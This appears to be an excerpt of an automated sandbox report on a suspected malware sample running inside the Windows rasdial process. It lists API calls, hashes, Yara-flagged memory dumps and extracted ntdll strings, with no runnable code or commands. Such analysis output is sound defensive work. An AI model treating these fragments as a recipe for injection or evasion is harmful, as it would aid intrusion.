                                                      • RtlFreeHeap.NTDLL(00000000,00000004,00000000,0010FC45,00000007,00000000,00000004,00000000,02C537B9,000000F4), ref: 02C6918F
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.3316284006.0000000002C40000.00000040.80000000.00040000.00000000.sdmp, Offset: 02C40000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_2c40000_rasdial.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: FreeHeap
                                                      • String ID:
                                                      • API String ID: 3298025750-0
                                                      • Opcode ID: 21a887275888f9565f0d5c27f43f3595d2ce9c6cf8850c99fe8b9620a2e14d34
                                                      • Instruction ID: 579af9933cc1d176e88c552722df39c748f7e04215fe521b57244bb12464e33b
                                                      • Opcode Fuzzy Hash: 21a887275888f9565f0d5c27f43f3595d2ce9c6cf8850c99fe8b9620a2e14d34
                                                      • Instruction Fuzzy Hash: 30E065722042047FDA14EE58DC44FAB33ADEF89710F004018FA08A7241CA70B9108AB5
                                                      APIs
                                                      • RtlAllocateHeap.NTDLL(02C51409,?,02C6523B,02C51409,02C650DF,02C6523B,?,02C51409,02C650DF,00001000,?,?,00000000), ref: 02C6913F
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.3316284006.0000000002C40000.00000040.80000000.00040000.00000000.sdmp, Offset: 02C40000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_2c40000_rasdial.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: AllocateHeap
                                                      • String ID:
                                                      • API String ID: 1279760036-0
                                                      • Opcode ID: a6ff5ca3a5dbbea5a6c0b0ac1db6e56cf909ba38468f7b4cb112d0a282205096
                                                      • Instruction ID: 77c0a1aa494f186f747a8067cb1e90b6d9f5f071415b1e178f5f0894fa96fab2
                                                      • Opcode Fuzzy Hash: a6ff5ca3a5dbbea5a6c0b0ac1db6e56cf909ba38468f7b4cb112d0a282205096
                                                      • Instruction Fuzzy Hash: CCE06D712042057FCA10EE58DC40FAB37ADDFC9750F004018F948A7241CA71BD108BB5
                                                      APIs
                                                      • GetFileAttributesW.KERNELBASE(?,00000002,000016A8,?,000004D8,00000000), ref: 02C57D8C
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.3316284006.0000000002C40000.00000040.80000000.00040000.00000000.sdmp, Offset: 02C40000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_2c40000_rasdial.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: AttributesFile
                                                      • String ID:
                                                      • API String ID: 3188754299-0
                                                      • Opcode ID: 090edafa64fe55acc956f56fece31b4b26d8c8772244cee9ae27d04153aeb1be
                                                      • Instruction ID: ecc3bb640632a9f39106b7cfd5ecc3e9b3dc6470386126669592378585b9e1f1
                                                      • Opcode Fuzzy Hash: 090edafa64fe55acc956f56fece31b4b26d8c8772244cee9ae27d04153aeb1be
                                                      • Instruction Fuzzy Hash: C8E0D87724021426E72456688C45BB533198B89368F284610BC18DB2C2D379D6814550
                                                      APIs
                                                      • GetFileAttributesW.KERNELBASE(?,00000002,000016A8,?,000004D8,00000000), ref: 02C57D8C
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.3316284006.0000000002C40000.00000040.80000000.00040000.00000000.sdmp, Offset: 02C40000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_2c40000_rasdial.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: AttributesFile
                                                      • String ID:
                                                      • API String ID: 3188754299-0
                                                      • Opcode ID: aa715be84dc1786330d8e3a9c19bbb14877f2b2f3bc9f7616327c753a0cfc76d
                                                      • Instruction ID: 8d2ddea03a612d072a453d1eaa58d406b67858a83c8a1c114fd60f2a148852cd
                                                      • Opcode Fuzzy Hash: aa715be84dc1786330d8e3a9c19bbb14877f2b2f3bc9f7616327c753a0cfc76d
                                                      • Instruction Fuzzy Hash: 3DE0867624031827EB246AA8DC45FB6335C8B8872CF684A60BD1CDB2C2E778F6814154
                                                      APIs
                                                      • SetErrorMode.KERNELBASE(00008003,?,?,02C51700,02C67A1F,02C650DF,02C516CD), ref: 02C57B83
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.3316284006.0000000002C40000.00000040.80000000.00040000.00000000.sdmp, Offset: 02C40000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_2c40000_rasdial.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: ErrorMode
                                                      • String ID:
                                                      • API String ID: 2340568224-0
                                                      • Opcode ID: a36f65924d5303618baab4b895ecc6f000d867d55bb0d249c79d78fb677258df
                                                      • Instruction ID: c92b2569be6157e53de21c61155ae9cb51344d0f8d4fc9478a1b190850488140
                                                      • Opcode Fuzzy Hash: a36f65924d5303618baab4b895ecc6f000d867d55bb0d249c79d78fb677258df
                                                      • Instruction Fuzzy Hash: CBE0C2B5B802102EE340ABF08C55FA63B498B84758F0980A4B54CDB2C3DAA1D1024A65
                                                      APIs
                                                      • SetErrorMode.KERNELBASE(00008003,?,?,02C51700,02C67A1F,02C650DF,02C516CD), ref: 02C57B83
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.3316284006.0000000002C40000.00000040.80000000.00040000.00000000.sdmp, Offset: 02C40000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_2c40000_rasdial.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: ErrorMode
                                                      • String ID:
                                                      • API String ID: 2340568224-0
                                                      • Opcode ID: 249e6409d385289b368032140e8d88fddebd760730d9839c89c052f2f5e3e973
                                                      • Instruction ID: 7e6f40ecbb000914df4a4a3bf02960297b666c50f0833f3735ea6b986bf941ca
                                                      • Opcode Fuzzy Hash: 249e6409d385289b368032140e8d88fddebd760730d9839c89c052f2f5e3e973
                                                      • Instruction Fuzzy Hash: 13D05E71B803043BE744B7F5CC0AF56328D9B44768F488064B94CD72C3EAA5E14049A5
                                                      APIs
                                                      • PostThreadMessageW.USER32(?,00000111), ref: 02C507E7
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.3316284006.0000000002C40000.00000040.80000000.00040000.00000000.sdmp, Offset: 02C40000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_2c40000_rasdial.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: MessagePostThread
                                                      • String ID:
                                                      • API String ID: 1836367815-0
                                                      • Opcode ID: cd11d55857e50e9293af255402c5c86e331596148f99e511fa3e3e30c6db0de7
                                                      • Instruction ID: 8b26f4b0b8ce8449af03c0eb31447300377f7cfc8c77921e55dab1a4a52f910f
                                                      • Opcode Fuzzy Hash: cd11d55857e50e9293af255402c5c86e331596148f99e511fa3e3e30c6db0de7
                                                      • Instruction Fuzzy Hash: 65D0A76774001C35A60145946CC1DFEB71CDB846A5F004063FF08D1040D62189020AB0
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.3318447334.0000000004AF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04AF0000, based on PE: true
                                                      • Associated: 00000006.00000002.3318447334.0000000004C19000.00000040.00001000.00020000.00000000.sdmp
                                                      • Associated: 00000006.00000002.3318447334.0000000004C1D000.00000040.00001000.00020000.00000000.sdmp
                                                      • Associated: 00000006.00000002.3318447334.0000000004C8E000.00000040.00001000.00020000.00000000.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_4af0000_rasdial.jbxd
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: bed94606d5fe131f729184c029b336c75c7ac11d057c83f16867f4c3b0b9eb2e
                                                      • Instruction ID: 66f03ca5e4f83f0fce20247c702d14b5c2015621d5897325d6a40bb9f3bcc5b1
                                                      • Opcode Fuzzy Hash: bed94606d5fe131f729184c029b336c75c7ac11d057c83f16867f4c3b0b9eb2e
                                                      • Instruction Fuzzy Hash: A1B09B729015C5C9FB15F760460C7177900EBD0705F15C0F1D2130646E473CD1D1E175
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.3318397586.00000000049E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 049E0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_49e0000_rasdial.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 78d71aa83f5f989b807599720f6a7f5bdc599571adb551d1a698cc180d8e52e8
                                                      • Instruction ID: 540373900b044906917c5d70cf46bf8dfc5a77776a4956fc972a399ab1444a06
                                                      • Opcode Fuzzy Hash: 78d71aa83f5f989b807599720f6a7f5bdc599571adb551d1a698cc180d8e52e8
                                                      • Instruction Fuzzy Hash: B441C67061CB1D8FD769AF6A9081676B3E6FB89304F50053DD98AC3252EBB0F8468785
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.3316284006.0000000002C40000.00000040.80000000.00040000.00000000.sdmp, Offset: 02C40000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_2c40000_rasdial.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 44295d915528b39c4561d85f5028c41108b0a9ce5b4428410bab197d34de4512
                                                      • Instruction ID: 8d8f8601d142c3a0d7f2a00fdf892a53dc54bf3482bf96148a8a650a6c23f2cd
                                                      • Opcode Fuzzy Hash: 44295d915528b39c4561d85f5028c41108b0a9ce5b4428410bab197d34de4512
                                                      • Instruction Fuzzy Hash: 3CB09226A1801402C128080D74412B0E3A4E397221D3032ABE808A31409046C452008D
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.3318397586.00000000049E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 049E0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_49e0000_rasdial.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: !"#$$%&'($)*+,$-./0$123@$4567$89:;$<=@@$?$@@@?$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@
                                                      • API String ID: 0-3558027158
                                                      • Opcode ID: 251f9b2fdc045052bddd954a044f2f861e67d4074b838531f97e8c64120fc4a5
                                                      • Instruction ID: bb6649c74a9cdb857205bc872da333c4e25fdf488934d24f338e2bb18aede28e
                                                      • Opcode Fuzzy Hash: 251f9b2fdc045052bddd954a044f2f861e67d4074b838531f97e8c64120fc4a5
                                                      • Instruction Fuzzy Hash: C1914FF04482988AC7158F55A0612AFFFB1EBC6305F15816DE7E6BB243C3BE8945CB85
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.3318447334.0000000004AF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04AF0000, based on PE: true
                                                      • Associated: 00000006.00000002.3318447334.0000000004C19000.00000040.00001000.00020000.00000000.sdmp
                                                      • Associated: 00000006.00000002.3318447334.0000000004C1D000.00000040.00001000.00020000.00000000.sdmp
                                                      • Associated: 00000006.00000002.3318447334.0000000004C8E000.00000040.00001000.00020000.00000000.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_4af0000_rasdial.jbxd
                                                      Similarity
                                                      • API ID: ___swprintf_l
                                                      • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                      • API String ID: 48624451-2108815105
                                                      • Opcode ID: 20955e697b5c954da2e3b36f5b608e9ee83dcdbf2659a6cb3afb88a4c9be933f
                                                      • Instruction ID: 768c95fcf6223682599cf70198315c69e8ba2b0e0f6b2c8bb9dae7ab3057e6fe
                                                      • Opcode Fuzzy Hash: 20955e697b5c954da2e3b36f5b608e9ee83dcdbf2659a6cb3afb88a4c9be933f
                                                      • Instruction Fuzzy Hash: D85199A5B001567FEB14EFA88C9097EF7F8FB5820575481E9E469D7641E238FE408BA0
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.3318447334.0000000004AF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04AF0000, based on PE: true
                                                      • Associated: 00000006.00000002.3318447334.0000000004C19000.00000040.00001000.00020000.00000000.sdmp
                                                      • Associated: 00000006.00000002.3318447334.0000000004C1D000.00000040.00001000.00020000.00000000.sdmp
                                                      • Associated: 00000006.00000002.3318447334.0000000004C8E000.00000040.00001000.00020000.00000000.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_4af0000_rasdial.jbxd
                                                      Similarity
                                                      • API ID: ___swprintf_l
                                                      • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                      • API String ID: 48624451-2108815105
                                                      • Opcode ID: c4f3a4e8b82559cc832d6a4ee702af2e644e993ff11cf21820cb39a07c03328a
                                                      • Instruction ID: 71686fdd456fadfa3929d3e3d96fe4ae7baef27379a58268564a793dffe93536
                                                      • Opcode Fuzzy Hash: c4f3a4e8b82559cc832d6a4ee702af2e644e993ff11cf21820cb39a07c03328a
                                                      • Instruction Fuzzy Hash: 04512771A00686AFDB38DF9CC99097FB7F8EB44204B4084DAE995D3641F674FA00CB60
                                                      Strings
                                                      • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 04B946FC
                                                      • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 04B94742
                                                      • Execute=1, xrefs: 04B94713
                                                      • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 04B94725
                                                      • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 04B94655
                                                      • CLIENT(ntdll): Processing section info %ws..., xrefs: 04B94787
                                                      • ExecuteOptions, xrefs: 04B946A0
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.3318447334.0000000004AF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04AF0000, based on PE: true
                                                      • Associated: 00000006.00000002.3318447334.0000000004C19000.00000040.00001000.00020000.00000000.sdmp
                                                      • Associated: 00000006.00000002.3318447334.0000000004C1D000.00000040.00001000.00020000.00000000.sdmp
                                                      • Associated: 00000006.00000002.3318447334.0000000004C8E000.00000040.00001000.00020000.00000000.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_4af0000_rasdial.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                      • API String ID: 0-484625025
                                                      • Opcode ID: 0b19533eaeec79e50d9fc276d45c63c7c303b1e9a3660a828570b02800aefddd
                                                      • Instruction ID: 022c3fd06af9e381cdb949651bd69852dc2eb4f06a0f364f8022551b21b1e76a
                                                      • Opcode Fuzzy Hash: 0b19533eaeec79e50d9fc276d45c63c7c303b1e9a3660a828570b02800aefddd
                                                      • Instruction Fuzzy Hash: EE51E735700219ABEF11AAA4EC99FEDB7A8EF04304F1400E9E905A71A0EF71BE458F51
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.3318447334.0000000004AF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04AF0000, based on PE: true
                                                      • Associated: 00000006.00000002.3318447334.0000000004C19000.00000040.00001000.00020000.00000000.sdmp
                                                      • Associated: 00000006.00000002.3318447334.0000000004C1D000.00000040.00001000.00020000.00000000.sdmp
                                                      • Associated: 00000006.00000002.3318447334.0000000004C8E000.00000040.00001000.00020000.00000000.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_4af0000_rasdial.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 2a48bdd4d8ea14c469ad441b94cf96c101b09c67394ceba66eb56f2a3b9e53c1
                                                      • Instruction ID: ab1c07c96f520261947ac46e4ba1dc20d96e2dbb9829599e1a5e79700df2fa54
                                                      • Opcode Fuzzy Hash: 2a48bdd4d8ea14c469ad441b94cf96c101b09c67394ceba66eb56f2a3b9e53c1
                                                      • Instruction Fuzzy Hash: 0B021771508341AFD705DF18C890A6FBBE5EFC8704F0489ADFA994B254DB31E90ACB92
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.3318447334.0000000004AF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04AF0000, based on PE: true
                                                      • Associated: 00000006.00000002.3318447334.0000000004C19000.00000040.00001000.00020000.00000000.sdmp
                                                      • Associated: 00000006.00000002.3318447334.0000000004C1D000.00000040.00001000.00020000.00000000.sdmp
                                                      • Associated: 00000006.00000002.3318447334.0000000004C8E000.00000040.00001000.00020000.00000000.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_4af0000_rasdial.jbxd
                                                      Similarity
                                                      • API ID: __aulldvrm
                                                      • String ID: +$-$0$0
                                                      • API String ID: 1302938615-699404926
                                                      • Opcode ID: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                      • Instruction ID: 3a9962f079b68ad266e21a98fe8e83c2d54450cea0a03ee6069e75706d7d7337
                                                      • Opcode Fuzzy Hash: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                      • Instruction Fuzzy Hash: 3381B070E492699EDF248E68C8917FEBBB2EF45310F18419AD863E7291D73CB840CB50
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.3318447334.0000000004AF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04AF0000, based on PE: true
                                                      • Associated: 00000006.00000002.3318447334.0000000004C19000.00000040.00001000.00020000.00000000.sdmp
                                                      • Associated: 00000006.00000002.3318447334.0000000004C1D000.00000040.00001000.00020000.00000000.sdmp
                                                      • Associated: 00000006.00000002.3318447334.0000000004C8E000.00000040.00001000.00020000.00000000.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_4af0000_rasdial.jbxd
                                                      Similarity
                                                      • API ID: ___swprintf_l
                                                      • String ID: %%%u$[$]:%u
                                                      • API String ID: 48624451-2819853543
                                                      • Opcode ID: 6f2ba91973ed2de6d2fdcdf5f2805eecab3e7b5e1193caf1601fb7595750e874
                                                      • Instruction ID: ea80436bd6062cd7446c22511115a7e94d0955918633a384d264d74e323479c9
                                                      • Opcode Fuzzy Hash: 6f2ba91973ed2de6d2fdcdf5f2805eecab3e7b5e1193caf1601fb7595750e874
                                                      • Instruction Fuzzy Hash: FB215176A00159ABDB14DEB9CC41AAEBBF8EF58654F4441D6E915E3200F730AA118BA1
                                                      Strings
                                                      • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 04B902E7
                                                      • RTL: Re-Waiting, xrefs: 04B9031E
                                                      • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 04B902BD
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.3318447334.0000000004AF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04AF0000, based on PE: true
                                                      • Associated: 00000006.00000002.3318447334.0000000004C19000.00000040.00001000.00020000.00000000.sdmp
                                                      • Associated: 00000006.00000002.3318447334.0000000004C1D000.00000040.00001000.00020000.00000000.sdmp
                                                      • Associated: 00000006.00000002.3318447334.0000000004C8E000.00000040.00001000.00020000.00000000.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_4af0000_rasdial.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                      • API String ID: 0-2474120054
                                                      • Opcode ID: 8e5c5204275ddb8cded2bb89245fee76848e777ace6ec8ebb75195276ce7f211
                                                      • Instruction ID: 0abe716380940eed0992ea21f452a88db7d83708c95fda2d713d7f2334063567
                                                      • Opcode Fuzzy Hash: 8e5c5204275ddb8cded2bb89245fee76848e777ace6ec8ebb75195276ce7f211
                                                      • Instruction Fuzzy Hash: 67E19F306087419FDB25DF28C884B2AB7E0FB89314F144AA9F5A58B2E1E774F945DB42
                                                      Strings
                                                      • RTL: Re-Waiting, xrefs: 04B97BAC
                                                      • RTL: Resource at %p, xrefs: 04B97B8E
                                                      • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 04B97B7F
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.3318447334.0000000004AF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04AF0000, based on PE: true
                                                      • Associated: 00000006.00000002.3318447334.0000000004C19000.00000040.00001000.00020000.00000000.sdmp
                                                      • Associated: 00000006.00000002.3318447334.0000000004C1D000.00000040.00001000.00020000.00000000.sdmp
                                                      • Associated: 00000006.00000002.3318447334.0000000004C8E000.00000040.00001000.00020000.00000000.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_4af0000_rasdial.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                      • API String ID: 0-871070163
                                                      • Opcode ID: cb167149c01a1f73034aeebbadbf795a5808dbacf2c9aabee8ed590e871ef5ce
                                                      • Instruction ID: 8b07e7fd5caa43a355e52830f5fa44cecb20fb6e0d42f117a943973a0f7763ae
                                                      • Opcode Fuzzy Hash: cb167149c01a1f73034aeebbadbf795a5808dbacf2c9aabee8ed590e871ef5ce
                                                      • Instruction Fuzzy Hash: 1F41F3317087029FDB20DE29C850B6AB7E5EF88714F100AADF95ADB690DB70F8058F91
                                                      APIs
                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 04B9728C
                                                      Strings
                                                      • RTL: Re-Waiting, xrefs: 04B972C1
                                                      • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 04B97294
                                                      • RTL: Resource at %p, xrefs: 04B972A3
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.3318447334.0000000004AF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04AF0000, based on PE: true
                                                      • Associated: 00000006.00000002.3318447334.0000000004C19000.00000040.00001000.00020000.00000000.sdmp
                                                      • Associated: 00000006.00000002.3318447334.0000000004C1D000.00000040.00001000.00020000.00000000.sdmp
                                                      • Associated: 00000006.00000002.3318447334.0000000004C8E000.00000040.00001000.00020000.00000000.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_4af0000_rasdial.jbxd
                                                      Similarity
                                                      • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                      • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                      • API String ID: 885266447-605551621
                                                      • Opcode ID: 344c2dc5a6d0bced3d3922ad1acb3572b2b914ac773a09da928b0812c159af30
                                                      • Instruction ID: 6aa81f8cd124e28e604e456798e1f7c1001650df2e67192a8277e539e11a427c
                                                      • Opcode Fuzzy Hash: 344c2dc5a6d0bced3d3922ad1acb3572b2b914ac773a09da928b0812c159af30
                                                      • Instruction Fuzzy Hash: 9541F031714606ABEF24DE28CC41B6AB7E5FF89714F1006A9FD55AB250EB30F8128BD1
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.3318447334.0000000004AF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04AF0000, based on PE: true
                                                      • Associated: 00000006.00000002.3318447334.0000000004C19000.00000040.00001000.00020000.00000000.sdmp
                                                      • Associated: 00000006.00000002.3318447334.0000000004C1D000.00000040.00001000.00020000.00000000.sdmp
                                                      • Associated: 00000006.00000002.3318447334.0000000004C8E000.00000040.00001000.00020000.00000000.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_4af0000_rasdial.jbxd
                                                      Similarity
                                                      • API ID: ___swprintf_l
                                                      • String ID: %%%u$]:%u
                                                      • API String ID: 48624451-3050659472
                                                      • Opcode ID: 63bb9194447261d5a3b604d3e4f602dc9f9f52e663f4327ad1b27010e29b9797
                                                      • Instruction ID: 581cf1bef2aa72cba9dbaea15856100021e29a7681f34e71c84a637ac7c0e243
                                                      • Opcode Fuzzy Hash: 63bb9194447261d5a3b604d3e4f602dc9f9f52e663f4327ad1b27010e29b9797
                                                      • Instruction Fuzzy Hash: EC315076A002599FDB24DF29CC40BEEB7F8EB44614F9445D6E859E3240FB30BA448FA1
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.3318447334.0000000004AF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04AF0000, based on PE: true
                                                      • Associated: 00000006.00000002.3318447334.0000000004C19000.00000040.00001000.00020000.00000000.sdmp
                                                      • Associated: 00000006.00000002.3318447334.0000000004C1D000.00000040.00001000.00020000.00000000.sdmp
                                                      • Associated: 00000006.00000002.3318447334.0000000004C8E000.00000040.00001000.00020000.00000000.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_4af0000_rasdial.jbxd
                                                      Similarity
                                                      • API ID: __aulldvrm
                                                      • String ID: +$-
                                                      • API String ID: 1302938615-2137968064
                                                      • Opcode ID: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                      • Instruction ID: 67e236405963f369078c49cb844ba76e8ad9070e8a55a96eaf25fc02db3bb898
                                                      • Opcode Fuzzy Hash: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                      • Instruction Fuzzy Hash: 9191A871E002559BDF24DE69C890ABEB7A5FF44728F14499EE857E72C0EF3CA9408750
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.3318447334.0000000004AF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04AF0000, based on PE: true
                                                      • Associated: 00000006.00000002.3318447334.0000000004C19000.00000040.00001000.00020000.00000000.sdmp
                                                      • Associated: 00000006.00000002.3318447334.0000000004C1D000.00000040.00001000.00020000.00000000.sdmp
                                                      • Associated: 00000006.00000002.3318447334.0000000004C8E000.00000040.00001000.00020000.00000000.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_4af0000_rasdial.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: $$@
                                                      • API String ID: 0-1194432280
                                                      • Opcode ID: 31ece63338df2002f641fc0e40ea63118201df22eb6b8608831e00a53f6f8cb4
                                                      • Instruction ID: bee860b594146e1ee2bc688469d50673a00b53f17d0c689f40b4812a108b6b83
                                                      • Opcode Fuzzy Hash: 31ece63338df2002f641fc0e40ea63118201df22eb6b8608831e00a53f6f8cb4
                                                      • Instruction Fuzzy Hash: C3812BB5E002699BDB35DF54CD44BEAB7B4AF49714F0041DAA91DB7240E730AE84CFA0
                                                      APIs
                                                      • @_EH4_CallFilterFunc@8.LIBCMT ref: 04BACFBD
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.3318447334.0000000004AF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04AF0000, based on PE: true
                                                      • Associated: 00000006.00000002.3318447334.0000000004C19000.00000040.00001000.00020000.00000000.sdmp
                                                      • Associated: 00000006.00000002.3318447334.0000000004C1D000.00000040.00001000.00020000.00000000.sdmp
                                                      • Associated: 00000006.00000002.3318447334.0000000004C8E000.00000040.00001000.00020000.00000000.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_4af0000_rasdial.jbxd
                                                      Similarity
                                                      • API ID: CallFilterFunc@8
                                                      • String ID: @$@4Qw@4Qw
                                                      • API String ID: 4062629308-2383119779
                                                      • Opcode ID: 75454959273d7af41c3bf9e1ccee3f5d0bf0919c59ed6ff7a571c6a0ac3f37fd
                                                      • Instruction ID: a0398c18bb50eb541020949c741c1b26e64b3a1228662ddc74a1e9b9dbab484e
                                                      • Opcode Fuzzy Hash: 75454959273d7af41c3bf9e1ccee3f5d0bf0919c59ed6ff7a571c6a0ac3f37fd
                                                      • Instruction Fuzzy Hash: EA41E571A04214DFEB21DFA5D940AAEBBF9FF45B08F0040AAE915DB260D734F811DB60
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.3318397586.00000000049E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 049E0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_49e0000_rasdial.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: 0$:$age=$max-
                                                      • API String ID: 0-2033457386
